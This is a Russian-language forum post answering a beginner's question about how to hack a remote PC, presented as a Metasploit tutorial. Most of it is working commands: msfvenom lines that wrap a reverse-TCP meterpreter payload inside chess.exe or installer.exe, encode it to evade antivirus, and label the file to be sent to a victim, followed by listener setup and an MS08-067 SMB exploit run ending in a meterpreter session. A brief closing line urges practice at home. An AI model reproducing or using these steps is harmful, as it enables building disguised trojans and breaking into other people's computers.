Сообщение от
NikByte
NikByte said:
↑
Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.
[*] Если вы пользуетесь KALI LINUX , то там уже встроен METASPLOIT FRAMEWORK . Советую вам с ним разобраться , очень мощная утилита (написана на Руби).
Инструмент имеет несколько конфигураций:
---------------------------------------------------------------------------------------------------------------------------------
1) Командная оболочка (
msfconsole);
2) Веб-интерфейс (
Metasploit Community, PRO и Express);
3) Графическая оболочка (
Armitage, и более продвинутая версия -
Cobalt strike).
--------------------------------------------------------------------------------------------------------------------------------
(Для дистрибутива , где нет сборки для Pentesting )Если у вас все еще нет Метасплоита — не беда, скачать его можно на официальном сайте
metasploit.com
Стоит отметить, что
msf корректно работает только с базой
PostgreSQL.
После того как вы загрузили пакет, откроем консоль и выполним следующее:
1)
cd Download/ (перейдем в каталог загрузок);
2)
chmod +X metasploit-latest-linux-installer.run (даем права на запуск);
3)
sudo ./metasploit-latest-linux-installer.run (запускаем графическую установку).
В качестве краткого описания ознакомимся с основными понятиями, а также рассмотрим некоторые команды
MSF.
[*] Exploit— Фрагмент кода, использующий уязвимость в ПО или ОС для выполнения атаки на систему.
[*]
Module — Модуль, автоматизирующий процесс какой-либо атаки.
[*]
Shellcode — Шеллкод. Используется как полезная нагрузка эксплойта, обеспечивающая доступ к командной оболочке ОС.
[*]
Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки. Видов нагрузки в msf немало.
[*]
«Stager» — Нагрузка, разбитая на части. Устанавливая соединение, шелл подгружается полностью.
[*]
«Reverse shell» — Бэкконнект шел.
[*]
«Meterpreter» — Пожалуй, один из популярных, если не самый популярный шелл. Имеет кучу возможностей: миграцию в процессы; XOR-шифрование, для обхода IDS и антивирусов; два вида dll-инжекции и т.д. Также можно выбрать «metsvc» нагрузку, что зальет и пропишет meterpreter как сервис.
Перед запуском утилиты:
service postgresql start
msfconsole
msf > db_status
[*] postgresql connected to msf3
msf >
msf > msfvenom
Давайте смотреть на некоторые самые важные варианты в этом списке.
================================================== ==================
- p определяет полезный груз Metasploit, который мы хотим использовать.
- e определяет кодирующее устройство, которое мы хотим использовать.
- a определение архитектуры, которую мы хотим использовать (дефолт - x86),
- s определяет максимальный размер полезного груза.
- iопределяю количество повторений, с которыми можно закодировать полезный груз.
- x определяет пользовательский исполняемый файл использовать в качестве шаблона
================================================== =======================
msf > msfvenom -l encoders
msf > msfvenom -p -o
msf >msfvenom -p windows/meterpreter/reverse_tcp -0
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe
- p/windows/meterpreter/reverse_tcp определяет полезный груз, который мы хотим включить
LHOST назначает местного хозяина (
ipconfigпропишите)
LPORT определяет порт, на котором мы хотим послушать
- x определяет шаблон, который мы хотим использовать и путь к нему
- e x86/shikata_ga_nai определяет кодирующее устройство, которое мы хотим использовать
- i 200 представляет количество повторений
- f exe -> создать исполняемый файл (.exe)
chess.exe название файла
----------------------------------------------------------------------------------------
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST 192.168.141.122
msf > set LPORT 4444
msf > exploit
----------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe
give victim- отправляем жертве
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST 192.168.73.128
msf > set LPORT 4444
msf > exploit
-----------------------------------------------------------------------------------------
msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
Теперь опции также включают опции полезной нагрузки.
Важные опции установить являются LHOST и LPORT.
Немного подробнее:
================================================== ===============================
LHOST - IP-адрес локальной машины или машины хакера.
LPORT - номер порта, на котором обратный слушатель оболочки получит входящую оболочку.
================================================== ================================
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33
msf exploit(ms08_067_netapi) > set LPORT 6666
msf exploit(ms08_067_netapi) > exploit
meterpreter >
meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > run vnc
Ссылки
www.metasploit.com — Официальный сайт Метасплоита
www.offensive-security.com/metasploit-unleashed/Main_Page — Официальная документация по metasploit
Meterpreter
github.com/darkoperator/MSF-Installer — Скрипт автоматической установки metasploit
community.rapid7.com/docs/DOC-2100 — Подробная установка metasploit (linux)
Практикуйте у себя дома на своих компах ! Не забывайте про закон !
Happy Hacking )